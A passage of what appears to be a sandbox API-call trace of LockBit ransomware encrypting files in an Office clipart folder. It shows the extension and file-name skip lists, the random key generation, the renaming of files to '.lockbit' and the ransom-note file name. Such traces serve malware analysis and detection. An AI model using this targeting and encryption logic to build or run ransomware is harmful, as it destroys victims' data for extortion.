(lpString1="..", lpString2="DD01172_.WMF") returned -1 [0112.606] PathFindExtensionW (pszPath="DD01172_.WMF") returned=".WMF" [0112.606] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.606] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.606] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.606] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.607] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.608] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.608] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01172_.WMF") returned 1 [0112.608] lstrcmpiW (lpString1="ntldr", lpString2="DD01172_.WMF") returned 1 [0112.608] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01172_.WMF") returned 1 [0112.609] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01172_.WMF") returned -1 [0112.609] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01172_.WMF") returned -1 [0112.609] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01172_.WMF") returned 1 [0112.609] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01172_.WMF") returned 1 [0112.609] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.609] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned=".WMF" [0112.609] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.609] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.609] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.610] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.610] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.lockbit") returned 72 [0112.610] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0112.611] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.611] malloc (_Size=0x40068) returned 0x3d70450 [0112.612] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=2232) returned 1 [0112.612] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.612] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0112.613] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.613] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0112.613] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0112.618] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.619] malloc (_Size=0xa6) returned 0x77d7a8 [0112.619] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.620] free (_Block=0x77d7a8) [0112.620] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.620] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.620] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.620] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x70c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01173_.WMF", cAlternateFileName="")) returned 1 [0112.620] lstrcmpiW (lpString1=".", lpString2="DD01173_.WMF") returned -1 [0112.620] lstrcmpiW (lpString1="..", lpString2="DD01173_.WMF") returned -1 [0112.620] PathFindExtensionW (pszPath="DD01173_.WMF") returned=".WMF" [0112.620] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.620] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.620] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.620] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.620] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.620] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.620] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.621] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.621] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.622] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01173_.WMF") returned 1 [0112.622] lstrcmpiW (lpString1="ntldr", lpString2="DD01173_.WMF") returned 1 [0112.622] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01173_.WMF") returned 1 [0112.622] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01173_.WMF") returned -1 [0112.622] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01173_.WMF") returned -1 [0112.623] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01173_.WMF") returned 1 [0112.623] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01173_.WMF") returned 1 [0112.624] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.624] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned=".WMF" [0112.624] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.624] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.624] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.625] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.625] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.lockbit") returned 72 [0112.625] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0112.636] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.636] malloc (_Size=0x40068) returned 0x1ff1e60 [0112.636] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1804) returned 1 [0112.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0112.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0112.637] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.647] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.647] malloc (_Size=0xa6) returned 0x77d7a8 [0112.647] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.648] free (_Block=0x77d7a8) [0112.648] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.648] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.648] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.648] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01176_.WMF", cAlternateFileName="")) returned 1 [0112.648] lstrcmpiW (lpString1=".", lpString2="DD01176_.WMF") returned -1 [0112.648] lstrcmpiW (lpString1="..", lpString2="DD01176_.WMF") returned -1 [0112.648] PathFindExtensionW (pszPath="DD01176_.WMF") returned=".WMF" [0112.648] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.649] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.650] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.650] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.651] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01176_.WMF") returned 1 [0112.651] lstrcmpiW (lpString1="ntldr", lpString2="DD01176_.WMF") returned 1 [0112.651] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01176_.WMF") returned 1 [0112.651] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01176_.WMF") returned -1 [0112.651] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01176_.WMF") returned -1 [0112.651] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01176_.WMF") returned 1 [0112.651] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01176_.WMF") returned 1 [0112.651] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.652] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned=".WMF" [0112.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.652] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.652] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.653] lstrcmpiW (lpString1=".tmd", 